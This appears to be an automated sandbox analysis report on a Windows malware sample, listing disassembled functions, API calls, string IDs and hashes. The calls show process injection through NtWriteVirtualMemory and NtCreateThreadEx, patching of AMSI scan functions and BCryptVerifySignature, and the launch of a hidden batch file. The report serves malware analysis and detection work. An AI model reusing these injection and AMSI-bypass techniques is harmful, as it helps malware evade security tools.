                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AddressHandleModulePathProcProcess$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                                                              • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                              • API String ID: 724724934-2845693168
                                                                                                                              • Opcode ID: d9896ee9043d61e7d3d3d112f537923b601960b808052c5c5521ff96bf566d1f
                                                                                                                              • Instruction ID: 97e3190e4c3b27b77ba5042ac8574ef398947e1ca14be5acc8416f20869d60fe
                                                                                                                              • Opcode Fuzzy Hash: d9896ee9043d61e7d3d3d112f537923b601960b808052c5c5521ff96bf566d1f
                                                                                                                              • Instruction Fuzzy Hash: 7B330A3DA146588BEF11EB68D8908DDB3B6AF85701F2444E5E009E7755DFB0EE868F02
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BA1C0 Relevance: 59.6, APIs: 14, Strings: 19, Instructions: 1853librarynativeloaderCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 5810 28ba1c0-28ba1c3 5811 28ba1c8-28ba1cd 5810->5811 5811->5811 5812 28ba1cf-28ba8cd call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7a90 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetModuleHandleW GetProcAddress call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtOpenProcess call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2ee0 call 28a2f08 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 5811->5812 6043 28bbe4e-28bc0c6 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7ac0 * 3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7ac0 * 4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a44c4 * 3 5812->6043 6044 28ba8d3-28baa4d GetCurrentProcess call 28b7968 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 5812->6044 6044->6043 6136 28baa53-28baa83 call 28b58b0 IsBadReadPtr 6044->6136 6136->6043 6149 28baa89-28baa8e 6136->6149 6149->6043 6151 28baa94-28baab0 IsBadReadPtr 6149->6151 6151->6043 6153 28baab6-28baabf 6151->6153 6153->6043 6154 28baac5-28baaeb 6153->6154 6154->6043 6156 28baaf1-28bac6a GetCurrentProcess call 28b7968 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6154->6156 6156->6043 6221 28bac70-28bade6 call 28b7968 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6156->6221 6266 28bbcce-28bbe49 call 28a4824 call 28a4964 call 28a47b0 call 28a4964 call 28b7ac0 call 28a4824 call 28a4964 call 28a47b0 call 28a4964 call 28b7ac0 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6221->6266 6267 28badec-28bb05c call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28ba04c call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6221->6267 6266->6043 6387 28bb1fa-28bb358 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6267->6387 6388 28bb062-28bb063 6267->6388 6473 28bb35a-28bb37f call 28b9f9c 6387->6473 6474 28bb384-28bbca8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28ba058 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetModuleHandleW GetProcAddress call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtWriteVirtualMemory call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetModuleHandleW GetProcAddress call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtCreateThreadEx call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6387->6474 6390 28bb067-28bb1de call 28ba04c call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 6388->6390 6480 28bb1e3-28bb1f4 6390->6480 6473->6474 6746 28bbcad-28bbcb4 6474->6746 6480->6387 6480->6390 6746->6043 6747 28bbcba-28bbcc9 CloseHandle 6746->6747 6747->6043
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,UacScan,02905344,028BC0E4,ScanString,02905344,028BC0E4,ScanBuffer,02905344,028BC0E4,Initialize,02905344,028BC0E4,UacScan,02905344), ref: 028BA492
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028BA498
                                                                                                                              • NtOpenProcess.NTDLL(0290553C,001F0FFF,02905324,0290533C), ref: 028BA590
                                                                                                                                • Part of subcall function 028A2EE0: QueryPerformanceCounter.KERNEL32 ref: 028A2EE4
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,0000007C,00000000,00000000), ref: 028BA8E3
                                                                                                                                • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                                • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                                • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                              • IsBadReadPtr.KERNEL32(14FA0000,00000040,?,?,0000007C,00000000,00000000), ref: 028BAA7C
                                                                                                                              • IsBadReadPtr.KERNEL32(?,000000F8,14FA0000,00000040,?,?,0000007C,00000000,00000000), ref: 028BAAA9
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,11D95300,00003000,00000040,?,000000F8,14FA0000,00000040,?,?,0000007C,00000000,00000000), ref: 028BAB00
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,02905344,028BC0E4,ScanBuffer,02905344,028BC0E4,UacScan,02905344,028BC0E4,ScanBuffer,02905344,028BC0E4,OpenSession,02905344), ref: 028BB742
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028BB748
                                                                                                                              • NtWriteVirtualMemory.NTDLL(066E0000,066E0000,151C0000,11D95300,00000000,OpenSession,02905344,028BC0E4,UacInitialize,02905344,028BC0E4,00000000,C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,02905344), ref: 028BB859
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtCreateThreadEx,UacScan,02905344,028BC0E4,ScanString,02905344,028BC0E4,?,?,0000007C,00000000,00000000), ref: 028BB947
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028BB94D
                                                                                                                              • NtCreateThreadEx.NTDLL(02905518,02000000,02905324,066E15CF,066E15CF,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02905344,028BC0E4,UacInitialize,02905344), ref: 028BBBC9
                                                                                                                              • CloseHandle.KERNEL32(0000087C,ScanString,02905344,028BC0E4,OpenSession,02905344,028BC0E4,?,?,0000007C,00000000,00000000), ref: 028BBCC4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Handle$AddressModuleProc$Process$CurrentMemoryReadVirtual$AllocateCloseCounterCreateLibraryLoadOpenPerformanceQueryThreadWrite
                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                                              • API String ID: 2231242433-1854689126
                                                                                                                              • Opcode ID: 1be29109a4196bca821711bd506ff18dc5f4877e0259441015eca250a4131f6c
                                                                                                                              • Instruction ID: 43e865e00dbb38511e410ee2318040f0ce83a3e925f0936e4f958cc1cc32ff0e
                                                                                                                              • Opcode Fuzzy Hash: 1be29109a4196bca821711bd506ff18dc5f4877e0259441015eca250a4131f6c
                                                                                                                              • Instruction Fuzzy Hash: CFF2203CA401599FEF12EBA8DC90ADEB3B6BF45701F1480A69109F7314DEB49E468F52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A5A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 9803 28a5a90-28a5ad1 GetModuleFileNameA RegOpenKeyExA 9804 28a5b13-28a5b56 call 28a58cc RegQueryValueExA 9803->9804 9805 28a5ad3-28a5aef RegOpenKeyExA 9803->9805 9812 28a5b7a-28a5b94 RegCloseKey 9804->9812 9813 28a5b58-28a5b74 RegQueryValueExA 9804->9813 9805->9804 9806 28a5af1-28a5b0d RegOpenKeyExA 9805->9806 9806->9804 9808 28a5b9c-28a5bcd lstrcpynA GetThreadLocale GetLocaleInfoA 9806->9808 9810 28a5bd3-28a5bd7 9808->9810 9811 28a5cb6-28a5cbd 9808->9811 9814 28a5bd9-28a5bdd 9810->9814 9815 28a5be3-28a5bf9 lstrlenA 9810->9815 9813->9812 9816 28a5b76 9813->9816 9814->9811 9814->9815 9818 28a5bfc-28a5bff 9815->9818 9816->9812 9819 28a5c0b-28a5c13 9818->9819 9820 28a5c01-28a5c09 9818->9820 9819->9811 9822 28a5c19-28a5c1e 9819->9822 9820->9819 9821 28a5bfb 9820->9821 9821->9818 9823 28a5c48-28a5c4a 9822->9823 9824 28a5c20-28a5c46 lstrcpynA LoadLibraryExA 9822->9824 9823->9811 9825 28a5c4c-28a5c50 9823->9825 9824->9823 9825->9811 9826 28a5c52-28a5c82 lstrcpynA LoadLibraryExA 9825->9826 9826->9811 9827 28a5c84-28a5cb4 lstrcpynA LoadLibraryExA 9826->9827 9827->9811
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,028A0000,028CB790), ref: 028A5AAC
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028A0000,028CB790), ref: 028A5ACA
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028A0000,028CB790), ref: 028A5AE8
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028A5B06
                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028A5B4F
                                                                                                                              • RegQueryValueExA.ADVAPI32(?,028A5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028A5B95,?,80000001), ref: 028A5B6D
                                                                                                                              • RegCloseKey.ADVAPI32(?,028A5B9C,00000000,?,?,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5B8F
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028A5BAC
                                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028A5BB9
                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028A5BBF
                                                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028A5BEA
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028A5C31
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028A5C41
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028A5C69
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028A5C79
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028A5C9F
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028A5CAF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                              • API String ID: 1759228003-2375825460
                                                                                                                              • Opcode ID: e7928159ef4fecf9804248ab2666db1afd66564984777f1dce9224ca3f2340cd
                                                                                                                              • Instruction ID: 6b780af5619e30e0525a504d184fe80fca722e9eaffa2bd9be431d16b0385779
                                                                                                                              • Opcode Fuzzy Hash: e7928159ef4fecf9804248ab2666db1afd66564984777f1dce9224ca3f2340cd
                                                                                                                              • Instruction Fuzzy Hash: 2F51687DE4021C7AFB25D6A8CC56FEF77AD9B04744F8001A1A608E6181EF78DA848F65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BCA6C Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 400processsynchronizationCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 11537 28bca6c-28bca70 11538 28bca75-28bca7a 11537->11538 11538->11538 11539 28bca7c-28bcf2f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4704 * 2 call 28a4824 call 28a473c call 28a3098 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4704 call 28a7ee8 call 28a4964 call 28a4d38 call 28a4db4 call 28a4704 call 28a4964 call 28a4d38 call 28a4db4 CreateProcessAsUserW call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 11538->11539 11700 28bd03a-28bd087 call 28a44c4 call 28a4c24 call 28a44c4 call 28a4c24 call 28a44c4 11539->11700 11701 28bcf35-28bd035 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 WaitForSingleObject CloseHandle * 2 11539->11701 11701->11700
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02905644,02905688,ScanString,02905344,028BD0A4,OpenSession,02905344), ref: 028BCDD3
                                                                                                                              • WaitForSingleObject.KERNEL32(00000858,000000FF,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4,UacScan,02905344), ref: 028BD01F
                                                                                                                              • CloseHandle.KERNEL32(00000858,00000858,000000FF,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4,UacScan), ref: 028BD02A
                                                                                                                              • CloseHandle.KERNEL32(00000854,00000858,00000858,000000FF,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4,ScanString,02905344,028BD0A4,OpenSession,02905344,028BD0A4), ref: 028BD035
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                                                                                                                              • String ID: *"C:\Users\Public\Libraries\OcihlomcO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                              • API String ID: 1205125484-1239978583
                                                                                                                              • Opcode ID: 1a9bbd01f3f971e84c76701d57c38b29281e05783ac2c7720054ab98160dd296
                                                                                                                              • Instruction ID: 98dc5d2fe5ec834968c9fe3f16b39324f20b7b471fb2bbd3dcd9689a1d56182d
                                                                                                                              • Opcode Fuzzy Hash: 1a9bbd01f3f971e84c76701d57c38b29281e05783ac2c7720054ab98160dd296
                                                                                                                              • Instruction Fuzzy Hash: CEF12F3DA001599FFF11EBA8D890BDEB3B6BF45700F648465A104EB315DEB4AD468F12
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B7AC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 11741 28b7ac0-28b7adb LoadLibraryW 11742 28b7b0a-28b7b12 11741->11742 11743 28b7add-28b7ae6 GetProcAddress 11741->11743 11744 28b7ae8-28b7b00 NtWriteVirtualMemory 11743->11744 11745 28b7b04-28b7b05 FreeLibrary 11743->11745 11744->11745 11746 28b7b02 11744->11746 11745->11742 11746->11745
                                                                                                                              APIs
                                                                                                                              • LoadLibraryW.KERNEL32(bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize,02905360,028B9A30,00000000,029053DC,ScanString,02905360,028B9A30), ref: 028B7AD2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028B7ADF
                                                                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize), ref: 028B7AF6
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize,02905360,028B9A30,00000000,029053DC), ref: 028B7B05
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                                                              • API String ID: 1002360270-4067648912
                                                                                                                              • Opcode ID: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                              • Instruction ID: 73342a6e248a7cc4d0edf143eb41f69e1bb43da48dfe3d3b25ce73901cb647c7
